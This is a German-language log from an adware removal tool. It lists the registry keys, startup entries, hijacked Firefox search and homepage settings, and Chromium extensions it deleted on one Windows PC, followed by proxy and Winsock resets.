[-] Schlüssel Gelöscht : HKCU\Software\DownloadProtect
[-] Schlüssel Gelöscht : HKCU\Software\FFUPD
[-] Schlüssel Gelöscht : HKCU\Software\FunFeedr
[-] Schlüssel Gelöscht : HKCU\Software\ICSW1.17
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Tinstalls
[!] Schlüssel Nicht Gelöscht : HKCU\Software\Mozilla\Extends
[-] Schlüssel Gelöscht : HKCU\Software\Palikan
[-] Schlüssel Gelöscht : HKCU\Software\PRODUCTSETUP
[-] Schlüssel Gelöscht : HKCU\Software\Professional Cleaning Software
[-] Schlüssel Gelöscht : HKCU\Software\ProfessionalCleaningSoftwareLanguage
[-] Schlüssel Gelöscht : HKCU\Software\Reg\Clean
[-] Schlüssel Gelöscht : HKCU\Software\SpaceSoundPro
[-] Schlüssel Gelöscht : HKCU\Software\tstamptoken
[-] Schlüssel Gelöscht : HKCU\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\Sams.Browser
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Clara
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\FFPluginHp
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\istartpageingSoftware
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MPC
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Professional Cleaning Software
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\QuickSearch
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Reg\Clean
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\SpaceSondPro
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Tutorials
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\WdsManPro
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\yessearchesSoftware
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\yoursearchingSoftware
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPC
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Professional Cleaning Software
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\BrowserAir
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\BubbleSound
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\SearchModule
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\SOUNDPLUS
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\SpaceSoundPro
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Speedchecker Limited
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SOUNDPLUS
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKU\S-1-5-19\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKU\S-1-5-20\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\BrowserAir
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DAILYPCCLEAN
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FFUPD
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FunFeedr
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ICSW1.17
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Tinstalls
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Mozilla\Extends
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Palikan
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\PRODUCTSETUP
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Professional Cleaning Software
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ProfessionalCleaningSoftwareLanguage
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Reg\Clean
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\SpaceSoundPro
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\tstamptoken
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\AppDataLow\Sams.Browser
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\shopperz010220161759
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
[-] Daten Wiederhergestellt : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\terraclicks.com
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\tradeadexchange.com
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www-searching.com
[-] Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [3D BubbleSound]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Sound+]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [SpaceSoundPro]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [IDSCPRODUCT]
[!] Wert Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
[-] Wert Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [SearchModule]
[-] Wert Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Security Utility]
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect.1
***** [ Internetbrowser ] *****
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename", "yessearches");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.search.selectedEngine", "yoursearching");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.startup.homepage", "search.mpc.am");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.enable_search1", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb3a");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.hp.guardType", "HPR");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013114");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454247403235");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gelöscht : user_pref("browser.newtab.url", "hxxp://www.istartpageing.com/newtab/?type=nt&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename", "istartpageing");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gelöscht : user_pref("browser.startup.homepage", "hxxp://www.istartpageing.com/?type=hp&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename", "istartpageing");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.search.selectedEngine", "istartpageing");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.startup.homepage", "hxxp://www.yessearches.com/?ts=AHEpB38oBXYsBE..&v=20160121&uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&mode=ffseng");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.enable_search1", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb40");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013120");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454267863579");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Web Data] [Search Provider] Gelöscht : palikan
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gelöscht : booedmolknjekdopkepjjeckmjkdpfgl
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gelöscht : flpcjncodpafbgdpnkljologafpionhb
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gelöscht : jlcgehabolcakkjhgmgpkagpolbjlhfa
*************************
:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
